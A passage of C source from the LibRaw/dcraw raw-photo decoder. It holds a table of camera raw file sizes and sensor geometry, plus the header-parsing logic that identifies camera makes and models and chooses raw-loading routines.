{ 5664912,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 5664912,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 5364240,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 6299648,2592,1944, 0, 0, 0, 0, 1 ,0x16,0,0,"OmniVisi","OV5648" },
{ 6721536,2592,1944, 0, 0, 0, 0, 0 ,0x16,0,0,"OmniVisi","OV56482" },
{ 6746112,2592,1944, 0, 0, 0, 0, 0 ,0x16,0,0,"HTC","OneSV" },
{ 9631728,2532,1902, 0, 0, 0, 0, 96,0x61,0,0,"Sony","5mp" },
{ 9830400,2560,1920, 0, 0, 0, 0, 96,0x61,0,0,"NGM","ForwardArt" },
{ 10186752,3264,2448, 0, 0, 0, 0, 1,0x94,0,0,"Sony","IMX219-mipi 8mp" },
{ 10223360,2608,1944, 0, 0, 0, 0, 96,0x16,0,0,"Sony","IMX" },
{ 10782464,3282,2448, 0, 0, 0, 0, 0 ,0x16,0,0,"HTC","MyTouch4GSlide" },
{ 10788864,3282,2448, 0, 0, 0, 0, 0, 0x16,0,0,"Xperia","L" },
{ 15967488,3264,2446, 0, 0, 0, 0, 96,0x16,0,0,"OmniVison","OV8850" },
{ 16224256,4208,3082, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G3MipiL" },
{ 16424960,4208,3120, 0, 0, 0, 0, 1, 0x16,0,0,"IMX135","MipiL" },
{ 17326080,4164,3120, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G3LQCom" },
{ 17522688,4212,3120, 0, 0, 0, 0, 0,0x16,0,0,"Sony","IMX135-QCOM" },
{ 19906560,4608,3456, 0, 0, 0, 0, 1, 0x16,0,0,"Gione","E7mipi" },
{ 19976192,5312,2988, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G4" },
{ 20389888,4632,3480, 0, 0, 0, 0, 1, 0x16,0,0,"Xiaomi","RedmiNote3Pro" },
{ 20500480,4656,3496, 0, 0, 0, 0, 1,0x94,0,0,"Sony","IMX298-mipi 16mp" },
{ 21233664,4608,3456, 0, 0, 0, 0, 1, 0x16,0,0,"Gione","E7qcom" },
{ 26023936,4192,3104, 0, 0, 0, 0, 96,0x94,0,0,"THL","5000" },
{ 26257920,4208,3120, 0, 0, 0, 0, 96,0x94,0,0,"Sony","IMX214" },
{ 26357760,4224,3120, 0, 0, 0, 0, 96,0x61,0,0,"OV","13860" },
{ 41312256,5248,3936, 0, 0, 0, 0, 96,0x61,0,0,"Meizu","MX4" },
{ 42923008,5344,4016, 0, 0, 0, 0, 96,0x61,0,0,"Sony","IMX230" },
// Android Raw dumps id end
{ 20137344,3664,2748,0, 0, 0, 0,0x40,0x49,0,0,"Aptina","MT9J003",0xffff },
{ 2868726,1384,1036, 0, 0, 0, 0,64,0x49,0,8,"Baumer","TXG14",1078 },
{ 5298000,2400,1766,12,12,44, 2,40,0x94,0,2,"Canon","PowerShot SD300" },
{ 6553440,2664,1968, 4, 4,44, 4,40,0x94,0,2,"Canon","PowerShot A460" },
{ 6573120,2672,1968,12, 8,44, 0,40,0x94,0,2,"Canon","PowerShot A610" },
{ 6653280,2672,1992,10, 6,42, 2,40,0x94,0,2,"Canon","PowerShot A530" },
{ 7710960,2888,2136,44, 8, 4, 0,40,0x94,0,2,"Canon","PowerShot S3 IS" },
{ 9219600,3152,2340,36,12, 4, 0,40,0x94,0,2,"Canon","PowerShot A620" },
{ 9243240,3152,2346,12, 7,44,13,40,0x49,0,2,"Canon","PowerShot A470" },
{ 10341600,3336,2480, 6, 5,32, 3,40,0x94,0,2,"Canon","PowerShot A720 IS" },
{ 10383120,3344,2484,12, 6,44, 6,40,0x94,0,2,"Canon","PowerShot A630" },
{ 12945240,3736,2772,12, 6,52, 6,40,0x94,0,2,"Canon","PowerShot A640" },
{ 15636240,4104,3048,48,12,24,12,40,0x94,0,2,"Canon","PowerShot A650" },
{ 15467760,3720,2772, 6,12,30, 0,40,0x94,0,2,"Canon","PowerShot SX110 IS" },
{ 15534576,3728,2778,12, 9,44, 9,40,0x94,0,2,"Canon","PowerShot SX120 IS" },
{ 18653760,4080,3048,24,12,24,12,40,0x94,0,2,"Canon","PowerShot SX20 IS" },
{ 19131120,4168,3060,92,16, 4, 1,40,0x94,0,2,"Canon","PowerShot SX220 HS" },
{ 21936096,4464,3276,25,10,73,12,40,0x16,0,2,"Canon","PowerShot SX30 IS" },
{ 24724224,4704,3504, 8,16,56, 8,40,0x49,0,2,"Canon","PowerShot A3300 IS" },
{ 30858240,5248,3920, 8,16,56,16,40,0x94,0,2,"Canon","IXUS 160" },
{ 1976352,1632,1211, 0, 2, 0, 1, 0,0x94,0,1,"Casio","QV-2000UX" },
{ 3217760,2080,1547, 0, 0,10, 1, 0,0x94,0,1,"Casio","QV-3*00EX" },
{ 6218368,2585,1924, 0, 0, 9, 0, 0,0x94,0,1,"Casio","QV-5700" },
{ 7816704,2867,2181, 0, 0,34,36, 0,0x16,0,1,"Casio","EX-Z60" },
{ 2937856,1621,1208, 0, 0, 1, 0, 0,0x94,7,13,"Casio","EX-S20" },
{ 4948608,2090,1578, 0, 0,32,34, 0,0x94,7,1,"Casio","EX-S100" },
{ 6054400,2346,1720, 2, 0,32, 0, 0,0x94,7,1,"Casio","QV-R41" },
{ 7426656,2568,1928, 0, 0, 0, 0, 0,0x94,0,1,"Casio","EX-P505" },
{ 7530816,2602,1929, 0, 0,22, 0, 0,0x94,7,1,"Casio","QV-R51" },
{ 7542528,2602,1932, 0, 0,32, 0, 0,0x94,7,1,"Casio","EX-Z50" },
{ 7562048,2602,1937, 0, 0,25, 0, 0,0x16,7,1,"Casio","EX-Z500" },
{ 7753344,2602,1986, 0, 0,32,26, 0,0x94,7,1,"Casio","EX-Z55" },
{ 9313536,2858,2172, 0, 0,14,30, 0,0x94,7,1,"Casio","EX-P600" },
{ 10834368,3114,2319, 0, 0,27, 0, 0,0x94,0,1,"Casio","EX-Z750" },
{ 10843712,3114,2321, 0, 0,25, 0, 0,0x94,0,1,"Casio","EX-Z75" },
{ 10979200,3114,2350, 0, 0,32,32, 0,0x94,7,1,"Casio","EX-P700" },
{ 12310144,3285,2498, 0, 0, 6,30, 0,0x94,0,1,"Casio","EX-Z850" },
{ 12489984,3328,2502, 0, 0,47,35, 0,0x94,0,1,"Casio","EX-Z8" },
{ 15499264,3754,2752, 0, 0,82, 0, 0,0x94,0,1,"Casio","EX-Z1050" },
{ 18702336,4096,3044, 0, 0,24, 0,80,0x94,7,1,"Casio","EX-ZR100" },
{ 7684000,2260,1700, 0, 0, 0, 0,13,0x94,0,1,"Casio","QV-4000" },
{ 787456,1024, 769, 0, 1, 0, 0, 0,0x49,0,0,"Creative","PC-CAM 600" },
{ 28829184,4384,3288, 0, 0, 0, 0,36,0x61,0,0,"DJI" },
{ 15151104,4608,3288, 0, 0, 0, 0, 0,0x94,0,0,"Matrix" },
{ 3840000,1600,1200, 0, 0, 0, 0,65,0x49,0,0,"Foculus","531C" },
{ 307200, 640, 480, 0, 0, 0, 0, 0,0x94,0,0,"Generic" },
{ 62464, 256, 244, 1, 1, 6, 1, 0,0x8d,0,0,"Kodak","DC20" },
{ 124928, 512, 244, 1, 1,10, 1, 0,0x8d,0,0,"Kodak","DC20" },
{ 1652736,1536,1076, 0,52, 0, 0, 0,0x61,0,0,"Kodak","DCS200" },
{ 4159302,2338,1779, 1,33, 1, 2, 0,0x94,0,0,"Kodak","C330" },
{ 4162462,2338,1779, 1,33, 1, 2, 0,0x94,0,0,"Kodak","C330",3160 },
{ 2247168,1232, 912, 0, 0,16, 0, 0,0x00,0,0,"Kodak","C330" },
{ 3370752,1232, 912, 0, 0,16, 0, 0,0x00,0,0,"Kodak","C330" },
{ 6163328,2864,2152, 0, 0, 0, 0, 0,0x94,0,0,"Kodak","C603" },
{ 6166488,2864,2152, 0, 0, 0, 0, 0,0x94,0,0,"Kodak","C603",3160 },
{ 460800, 640, 480, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","C603" },
{ 9116448,2848,2134, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","C603" },
{ 12241200,4040,3030, 2, 0, 0,13, 0,0x49,0,0,"Kodak","12MP" },
{ 12272756,4040,3030, 2, 0, 0,13, 0,0x49,0,0,"Kodak","12MP",31556 },
{ 18000000,4000,3000, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","12MP" },
{ 614400, 640, 480, 0, 3, 0, 0,64,0x94,0,0,"Kodak","KAI-0340" },
{ 15360000,3200,2400, 0, 0, 0, 0,96,0x16,0,0,"Lenovo","A820" },
{ 3884928,1608,1207, 0, 0, 0, 0,96,0x16,0,0,"Micron","2010",3212 },
{ 1138688,1534, 986, 0, 0, 0, 0, 0,0x61,0,0,"Minolta","RD175",513 },
{ 1581060,1305, 969, 0, 0,18, 6, 6,0x1e,4,1,"Nikon","E900" },
{ 2465792,1638,1204, 0, 0,22, 1, 6,0x4b,5,1,"Nikon","E950" },
{ 2940928,1616,1213, 0, 0, 0, 7,30,0x94,0,1,"Nikon","E2100" },
{ 4771840,2064,1541, 0, 0, 0, 1, 6,0xe1,0,1,"Nikon","E990" },
{ 4775936,2064,1542, 0, 0, 0, 0,30,0x94,0,1,"Nikon","E3700" },
{ 5865472,2288,1709, 0, 0, 0, 1, 6,0xb4,0,1,"Nikon","E4500" },
{ 5869568,2288,1710, 0, 0, 0, 0, 6,0x16,0,1,"Nikon","E4300" },
{ 7438336,2576,1925, 0, 0, 0, 1, 6,0xb4,0,1,"Nikon","E5000" },
{ 8998912,2832,2118, 0, 0, 0, 0,30,0x94,7,1,"Nikon","COOLPIX S6" },
{ 5939200,2304,1718, 0, 0, 0, 0,30,0x16,0,0,"Olympus","C770UZ" },
{ 3178560,2064,1540, 0, 0, 0, 0, 0,0x94,0,1,"Pentax","Optio S" },
{ 4841984,2090,1544, 0, 0,22, 0, 0,0x94,7,1,"Pentax","Optio S" },
{ 6114240,2346,1737, 0, 0,22, 0, 0,0x94,7,1,"Pentax","Optio S4" },
{ 10702848,3072,2322, 0, 0, 0,21,30,0x94,0,1,"Pentax","Optio 750Z" },
{ 4147200,1920,1080, 0, 0, 0, 0, 0,0x49,0,0,"Photron","BC2-HD" },
{ 4151666,1920,1080, 0, 0, 0, 0, 0,0x49,0,0,"Photron","BC2-HD",8 },
{ 13248000,2208,3000, 0, 0, 0, 0,13,0x61,0,0,"Pixelink","A782" },
{ 6291456,2048,1536, 0, 0, 0, 0,96,0x61,0,0,"RoverShot","3320AF" },
{ 311696, 644, 484, 0, 0, 0, 0, 0,0x16,0,8,"ST Micro","STV680 VGA" },
{ 16098048,3288,2448, 0, 0,24, 0, 9,0x94,0,1,"Samsung","S85" },
{ 16215552,3312,2448, 0, 0,48, 0, 9,0x94,0,1,"Samsung","S85" },
{ 20487168,3648,2808, 0, 0, 0, 0,13,0x94,5,1,"Samsung","WB550" },
{ 24000000,4000,3000, 0, 0, 0, 0,13,0x94,5,1,"Samsung","WB550" },
{ 12582980,3072,2048, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 33292868,4080,4080, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 44390468,4080,5440, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 1409024,1376,1024, 0, 0, 1, 0, 0,0x49,0,0,"Sony","XCD-SX910CR" },
{ 2818048,1376,1024, 0, 0, 1, 0,97,0x49,0,0,"Sony","XCD-SX910CR" },
};
#ifdef LIBRAW_LIBRARY_BUILD
libraw_custom_camera_t
table[64 + sizeof(const_table)/sizeof(const_table[0])];
#endif
static const char *corp[] =
{ "AgfaPhoto", "Canon", "Casio", "Epson", "Fujifilm",
"Mamiya", "Minolta", "Motorola", "Kodak", "Konica", "Leica",
"Nikon", "Nokia", "Olympus", "Pentax", "Phase One", "Ricoh",
"Samsung", "Sigma", "Sinar", "Sony" };
#ifdef LIBRAW_LIBRARY_BUILD
char head[64], *cp;
#else
char head[32], *cp;
#endif
int hlen, flen, fsize, zero_fsize=1, i, c;
struct jhead jh;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned camera_count = parse_custom_cameras(64,table,imgdata.params.custom_camera_strings);
for(int q = 0; q < sizeof(const_table)/sizeof(const_table[0]); q++)
memmove(&table[q+camera_count],&const_table[q],sizeof(const_table[0]));
camera_count += sizeof(const_table)/sizeof(const_table[0]);
#endif
tiff_flip = flip = filters = UINT_MAX; /* unknown */
raw_height = raw_width = fuji_width = fuji_layout = cr2_slice[0] = 0;
maximum = height = width = top_margin = left_margin = 0;
cdesc[0] = desc[0] = artist[0] = make[0] = model[0] = model2[0] = 0;
iso_speed = shutter = aperture = focal_len = unique_id = 0;
tiff_nifds = 0;
memset (tiff_ifd, 0, sizeof tiff_ifd);
memset (gpsdata, 0, sizeof gpsdata);
memset (cblack, 0, sizeof cblack);
memset (white, 0, sizeof white);
memset (mask, 0, sizeof mask);
thumb_offset = thumb_length = thumb_width = thumb_height = 0;
load_raw = thumb_load_raw = 0;
write_thumb = &CLASS jpeg_thumb;
data_offset = meta_offset = meta_length = tiff_bps = tiff_compress = 0;
kodak_cbpp = zero_after_ff = dng_version = load_flags = 0;
timestamp = shot_order = tiff_samples = black = is_foveon = 0;
mix_green = profile_length = data_error = zero_is_bad = 0;
pixel_aspect = is_raw = raw_color = 1;
tile_width = tile_length = 0;
for (i=0; i < 4; i++) {
cam_mul[i] = i == 1;
pre_mul[i] = i < 3;
FORC3 cmatrix[c][i] = 0;
FORC3 rgb_cam[c][i] = c == i;
}
colors = 3;
for (i=0; i < 0x10000; i++) curve[i] = i;
order = get2();
hlen = get4();
fseek (ifp, 0, SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
fread (head, 1, 64, ifp);
libraw_internal_data.unpacker_data.lenRAFData = libraw_internal_data.unpacker_data.posRAFData = 0;
#else
fread (head, 1, 32, ifp);
#endif
fseek (ifp, 0, SEEK_END);
flen = fsize = ftell(ifp);
if ((cp = (char *) memmem (head, 32, (char*)"MMMM", 4)) ||
(cp = (char *) memmem (head, 32, (char*)"IIII", 4))) {
parse_phase_one (cp-head);
if (cp-head && parse_tiff(0)) apply_tiff();
} else if (order == 0x4949 || order == 0x4d4d) {
if (!memcmp (head+6,"HEAPCCDR",8)) {
data_offset = hlen;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
#endif
parse_ciff (hlen, flen-hlen, 0);
load_raw = &CLASS canon_load_raw;
} else if (parse_tiff(0)) apply_tiff();
} else if (!memcmp (head,"\xff\xd8\xff\xe1",4) &&
!memcmp (head+6,"Exif",4)) {
fseek (ifp, 4, SEEK_SET);
data_offset = 4 + get2();
fseek (ifp, data_offset, SEEK_SET);
if (fgetc(ifp) != 0xff)
parse_tiff(12);
thumb_offset = 0;
} else if (!memcmp (head+25,"ARECOYK",7)) {
strcpy (make, "Contax");
strcpy (model,"N Digital");
fseek (ifp, 33, SEEK_SET);
get_timestamp(1);
fseek (ifp, 52, SEEK_SET);
switch (get4()) {
case 7: iso_speed = 25; break;
case 8: iso_speed = 32; break;
case 9: iso_speed = 40; break;
case 10: iso_speed = 50; break;
case 11: iso_speed = 64; break;
case 12: iso_speed = 80; break;
case 13: iso_speed = 100; break;
case 14: iso_speed = 125; break;
case 15: iso_speed = 160; break;
case 16: iso_speed = 200; break;
case 17: iso_speed = 250; break;
case 18: iso_speed = 320; break;
case 19: iso_speed = 400; break;
}
shutter = libraw_powf64(2.0f, (((float)get4())/8.0f)) / 16000.0f;
FORC4 cam_mul[c ^ (c >> 1)] = get4();
fseek (ifp, 88, SEEK_SET);
aperture = libraw_powf64(2.0f, ((float)get4())/16.0f);
fseek (ifp, 112, SEEK_SET);
focal_len = get4();
#ifdef LIBRAW_LIBRARY_BUILD
fseek (ifp, 104, SEEK_SET);
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, ((float)get4())/16.0f);
fseek (ifp, 124, SEEK_SET);
stmread(imgdata.lens.makernotes.Lens, 32, ifp);
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Contax_N;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Contax_N;
#endif
} else if (!strcmp (head, "PXN")) {
strcpy (make, "Logitech");
strcpy (model,"Fotoman Pixtura");
} else if (!strcmp (head, "qktk")) {
strcpy (make, "Apple");
strcpy (model,"QuickTake 100");
load_raw = &CLASS quicktake_100_load_raw;
} else if (!strcmp (head, "qktn")) {
strcpy (make, "Apple");
strcpy (model,"QuickTake 150");
load_raw = &CLASS kodak_radc_load_raw;
} else if (!memcmp (head,"FUJIFILM",8)) {
#ifdef LIBRAW_LIBRARY_BUILD
strcpy(model, head+0x1c);
memcpy(model2, head+0x3c, 4);
model2[4]=0;
#endif
fseek (ifp, 84, SEEK_SET);
thumb_offset = get4();
thumb_length = get4();
fseek (ifp, 92, SEEK_SET);
parse_fuji (get4());
if (thumb_offset > 120) {
fseek (ifp, 120, SEEK_SET);
is_raw += (i = get4())?1:0;
if (is_raw == 2 && shot_select)
parse_fuji (i);
}
load_raw = &CLASS unpacked_load_raw;
fseek (ifp, 100+28*(shot_select > 0), SEEK_SET);
parse_tiff (data_offset = get4());
parse_tiff (thumb_offset+12);
apply_tiff();
} else if (!memcmp (head,"RIFF",4)) {
fseek (ifp, 0, SEEK_SET);
parse_riff();
} else if (!memcmp (head+4,"ftypqt ",9)) {
fseek (ifp, 0, SEEK_SET);
parse_qt (fsize);
is_raw = 0;
} else if (!memcmp (head,"\0\001\0\001\0@",6)) {
fseek (ifp, 6, SEEK_SET);
fread (make, 1, 8, ifp);
fread (model, 1, 8, ifp);
fread (model2, 1, 16, ifp);
data_offset = get2();
get2();
raw_width = get2();
raw_height = get2();
load_raw = &CLASS nokia_load_raw;
filters = 0x61616161;
} else if (!memcmp (head,"NOKIARAW",8)) {
strcpy (make, "NOKIA");
order = 0x4949;
fseek (ifp, 300, SEEK_SET);
data_offset = get4();
i = get4();
width = get2();
height = get2();
#ifdef LIBRAW_LIBRARY_BUILD
// data length should be in range w*h..w*h*2
if(width*height < (LIBRAW_MAX_ALLOC_MB*1024*512L) && width*height>1
&& i >= width * height && i <= width*height*2)
{
#endif
switch (tiff_bps = i*8 / (width * height)) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 10: load_raw = &CLASS nokia_load_raw;
}
raw_height = height + (top_margin = i / (width * tiff_bps/8) - height);
mask[0][3] = 1;
filters = 0x61616161;
#ifdef LIBRAW_LIBRARY_BUILD
}
else
is_raw = 0;
#endif
} else if (!memcmp (head,"ARRI",4)) {
order = 0x4949;
fseek (ifp, 20, SEEK_SET);
width = get4();
height = get4();
strcpy (make, "ARRI");
fseek (ifp, 668, SEEK_SET);
fread (model, 1, 64, ifp);
data_offset = 4096;
load_raw = &CLASS packed_load_raw;
load_flags = 88;
filters = 0x61616161;
} else if (!memcmp (head,"XPDS",4)) {
order = 0x4949;
fseek (ifp, 0x800, SEEK_SET);
fread (make, 1, 41, ifp);
raw_height = get2();
raw_width = get2();
fseek (ifp, 56, SEEK_CUR);
fread (model, 1, 30, ifp);
data_offset = 0x10000;
load_raw = &CLASS canon_rmf_load_raw;
gamma_curve (0, 12.25, 1, 1023);
} else if (!memcmp (head+4,"RED1",4)) {
strcpy (make, "Red");
strcpy (model,"One");
parse_redcine();
load_raw = &CLASS redcine_load_raw;
gamma_curve (1/2.4, 12.92, 1, 4095);
filters = 0x49494949;
} else if (!memcmp (head,"DSC-Image",9))
parse_rollei();
else if (!memcmp (head,"PWAD",4))
parse_sinar_ia();
else if (!memcmp (head,"\0MRM",4))
parse_minolta(0);
else if (!memcmp (head,"FOVb",4))
{
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_FORCE_FOVEON_X3F))
parse_foveon();
else
#endif
parse_x3f();
#else
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
parse_foveon();
#endif
#endif
}
else if (!memcmp (head,"CI",2))
parse_cine();
if(make[0] == 0)
#ifdef LIBRAW_LIBRARY_BUILD
for (zero_fsize=i=0; i < camera_count; i++)
#else
for (zero_fsize=i=0; i < sizeof table / sizeof *table; i++)
#endif
if (fsize == table[i].fsize) {
strcpy (make, table[i].t_make );
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(make, "Canon",5))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
#endif
strcpy (model, table[i].t_model);
flip = table[i].flags >> 2;
zero_is_bad = table[i].flags & 2;
if (table[i].flags & 1)
parse_external_jpeg();
data_offset = table[i].offset == 0xffff?0:table[i].offset;
raw_width = table[i].rw;
raw_height = table[i].rh;
left_margin = table[i].lm;
top_margin = table[i].tm;
width = raw_width - left_margin - table[i].rm;
height = raw_height - top_margin - table[i].bm;
filters = 0x1010101 * table[i].cf;
colors = 4 - !((filters & filters >> 1) & 0x5555);
load_flags = table[i].lf;
switch (tiff_bps = (fsize-data_offset)*8 / (raw_width*raw_height)) {
case 6:
load_raw = &CLASS minolta_rd175_load_raw; break;
case 8:
load_raw = &CLASS eight_bit_load_raw; break;
case 10:
if ((fsize-data_offset)/raw_height*3 >= raw_width*4) {
load_raw = &CLASS android_loose_load_raw; break;
} else if (load_flags & 1) {
load_raw = &CLASS android_tight_load_raw; break;
}
case 12:
load_flags |= 128;
load_raw = &CLASS packed_load_raw; break;
case 16:
order = 0x4949 | 0x404 * (load_flags & 1);
tiff_bps -= load_flags >> 4;
tiff_bps -= load_flags = load_flags >> 1 & 7;
load_raw = table[i].offset == 0xffff ? &CLASS unpacked_load_raw_reversed : &CLASS unpacked_load_raw;
}
maximum = (1 << tiff_bps) - (1 << table[i].max);
}
if (zero_fsize) fsize = 0;
if (make[0] == 0) parse_smal (0, flen);
if (make[0] == 0) {
parse_jpeg(0);
fseek(ifp,0,SEEK_END);
int sz = ftell(ifp);
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(model,"RP_imx219",9) && sz >= 0x9cb600 &&
!fseek (ifp, -0x9cb600, SEEK_END) &&
fread (head, 1, 0x20, ifp) && !strncmp(head, "BRCM", 4)) {
strcpy (make, "Broadcom");
strcpy (model, "RPi IMX219");
if (raw_height > raw_width) flip = 5;
data_offset = ftell(ifp) + 0x8000 - 0x20;
parse_broadcom();
black = 66;
maximum = 0x3ff;
load_raw = &CLASS broadcom_load_raw;
thumb_offset = 0;
thumb_length = sz - 0x9cb600 - 1;
} else
if (!(strncmp(model,"ov5647",6) && strncmp(model,"RP_OV5647",9)) && sz >= 0x61b800 &&
!fseek (ifp, -0x61b800, SEEK_END) &&
fread (head, 1, 0x20, ifp) && !strncmp(head, "BRCM", 4)) {
strcpy (make, "Broadcom");
if (!strncmp(model,"ov5647",6))
strcpy (model, "RPi OV5647 v.1");
else
strcpy (model, "RPi OV5647 v.2");
if (raw_height > raw_width) flip = 5;
data_offset = ftell(ifp) + 0x8000 - 0x20;
parse_broadcom();
black = 16;
maximum = 0x3ff;
load_raw = &CLASS broadcom_load_raw;
thumb_offset = 0;
thumb_length = sz - 0x61b800 - 1;
#else
if (!(strncmp(model,"ov",2) && strncmp(model,"RP_OV",5)) && sz>=6404096 &&
!fseek (ifp, -6404096, SEEK_END) &&
fread (head, 1, 32, ifp) && !strcmp(head,"BRCMn")) {
strcpy (make, "OmniVision");
data_offset = ftell(ifp) + 0x8000-32;
width = raw_width;
raw_width = 2611;
load_raw = &CLASS nokia_load_raw;
filters = 0x16161616;
#endif
} else is_raw = 0;
}
#ifdef LIBRAW_LIBRARY_BUILD
// make sure strings are terminated
desc[511] = artist[63] = make[63] = model[63] = model2[63] = 0;
#endif
for (i=0; i < sizeof corp / sizeof *corp; i++)
if (strcasestr (make, corp[i])) /* Simplify company names */
strcpy (make, corp[i]);
if ((!strncmp(make,"Kodak",5) || !strncmp(make,"Leica",5)) &&
((cp = strcasestr(model," DIGITAL CAMERA")) ||
(cp = strstr(model,"FILE VERSION"))))
*cp = 0;
if (!strncasecmp(model,"PENTAX",6))
strcpy (make, "Pentax");
#ifdef LIBRAW_LIBRARY_BUILD
remove_trailing_spaces(make,sizeof(make));
remove_trailing_spaces(model,sizeof(model));
#else
cp = make + strlen(make); /* Remove trailing spaces */
while (*--cp == ' ') *cp = 0;
cp = model + strlen(model);
while (*--cp == ' ') *cp = 0;
#endif
i = strbuflen(make); /* Remove make from model */
if (!strncasecmp (model, make, i) && model[i++] == ' ')
memmove (model, model+i, 64-i);
if (!strncmp (model,"FinePix ",8))
strcpy (model, model+8);
if (!strncmp (model,"Digital Camera ",15))
strcpy (model, model+15);
desc[511] = artist[63] = make[63] = model[63] = model2[63] = 0;
if (!is_raw) goto notraw;
if (!height) height = raw_height;
if (!width) width = raw_width;
if (height == 2624 && width == 3936) /* Pentax K10D and Samsung GX10 */
{ height = 2616; width = 3896; }
if (height == 3136 && width == 4864) /* Pentax K20D and Samsung GX20 */
{ height = 3124; width = 4688; filters = 0x16161616; }
if (width == 4352 && (!strcmp(model,"K-r") || !strcmp(model,"K-x")))
{ width = 4309; filters = 0x16161616; }
if (width >= 4960 && !strncmp(model,"K-5",3))
{ left_margin = 10; width = 4950; filters = 0x16161616; }
if (width == 6080 && !strcmp(model,"K-70"))
{ height = 4016; top_margin=32; width=6020; left_margin = 60; }
if (width == 4736 && !strcmp(model,"K-7"))
{ height = 3122; width = 4684; filters = 0x16161616; top_margin = 2; }
if (width == 6080 && !strcmp(model,"K-3 II")) /* moved back */
{ left_margin = 4; width = 6040; }
if (width == 6080 && !strcmp(model,"K-3"))
{ left_margin = 4; width = 6040; }
if (width == 7424 && !strcmp(model,"645D"))
{ height = 5502; width = 7328; filters = 0x61616161; top_margin = 29;
left_margin = 48; }
if (height == 3014 && width == 4096) /* Ricoh GX200 */
width = 4014;
if (dng_version) {
if (filters == UINT_MAX) filters = 0;
if (filters) is_raw *= tiff_samples;
else colors = tiff_samples;
switch (tiff_compress) {
case 0: /* Compression not set, assuming uncompressed */
case 1: load_raw = &CLASS packed_dng_load_raw; break;
case 7: load_raw = &CLASS lossless_dng_load_raw; break;
#ifdef LIBRAW_LIBRARY_BUILD
case 8: load_raw = &CLASS deflate_dng_load_raw; break;
#endif
case 34892: load_raw = &CLASS lossy_dng_load_raw; break;
default: load_raw = 0;
}
if (!strncmp(make, "Canon",5) && unique_id)
{
for (i = 0; i < sizeof unique / sizeof *unique; i++)
if (unique_id == 0x80000000 + unique[i].id)
{
strcpy(model, unique[i].t_model);
break;
}
}
if (!strncasecmp(make, "Sony",4) && unique_id)
{
for (i = 0; i < sizeof sonique / sizeof *sonique; i++)
if (unique_id == sonique[i].id)
{
strcpy(model, sonique[i].t_model);
break;
}
}
goto dng_skip;
}
if (!strncmp(make,"Canon",5) && !fsize && tiff_bps != 15) {
if (!load_raw)
load_raw = &CLASS lossless_jpeg_load_raw;
for (i=0; i < sizeof canon / sizeof *canon; i++)
if (raw_width == canon[i][0] && raw_height == canon[i][1]) {
width = raw_width - (left_margin = canon[i][2]);
height = raw_height - (top_margin = canon[i][3]);
width -= canon[i][4];
height -= canon[i][5];
mask[0][1] = canon[i][6];
mask[0][3] = -canon[i][7];
mask[1][1] = canon[i][8];
mask[1][3] = -canon[i][9];
if (canon[i][10]) filters = canon[i][10] * 0x01010101;
}
if ((unique_id | 0x20000) == 0x2720000) {
left_margin = 8;
top_margin = 16;
}
}
if (!strncmp(make,"Canon",5) && unique_id)
{
for (i=0; i < sizeof unique / sizeof *unique; i++)
if (unique_id == 0x80000000 + unique[i].id)
{
adobe_coeff ("Canon", unique[i].t_model);
strcpy(model,unique[i].t_model);
}
}
if (!strncasecmp(make,"Sony",4) && unique_id)
{
for (i=0; i < sizeof sonique / sizeof *sonique; i++)
if (unique_id == sonique[i].id)
{
adobe_coeff ("Sony", sonique[i].t_model);
strcpy(model,sonique[i].t_model);
}
}
if (!strncmp(make,"Nikon",5)) {
if (!load_raw)
load_raw = &CLASS packed_load_raw;
if (model[0] == 'E')
load_flags |= !data_offset << 2 | 2;
}
/* Set parameters based on camera name (for non-DNG files). */
if (!strcmp(model,"KAI-0340")
&& find_green (16, 16, 3840, 5120) < 25) {
height = 480;
top_margin = filters = 0;
strcpy (model,"C603");
}
if (!strcmp(make, "Sony") && raw_width > 3888 && !black && !cblack[0])
black = 128 << (tiff_bps - 12);
if (is_foveon) {
if (height*2 < width) pixel_aspect = 0.5;
if (height > width) pixel_aspect = 2;
filters = 0;
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_FORCE_FOVEON_X3F))
simple_coeff(0);
#endif
}
else if(!strncmp(make,"Pentax",6))
{
if(!strncmp(model,"K-1",3))
{
top_margin = 18;
height = raw_height - top_margin;
if(raw_width == 7392)
{
left_margin = 6;
width = 7376;
}
}
}
else if (!strncmp(make,"Canon",5) && tiff_bps == 15) {
switch (width) {
case 3344: width -= 66;
case 3872: width -= 6;
}
if (height > width) {
SWAP(height,width);
SWAP(raw_height,raw_width);
}
if (width == 7200 && height == 3888)
{
raw_width = width = 6480;
raw_height = height = 4320;
}
filters = 0;
tiff_samples = colors = 3;
load_raw = &CLASS canon_sraw_load_raw;
} else if (!strcmp(model,"PowerShot 600")) {
height = 613;
width = 854;
raw_width = 896;
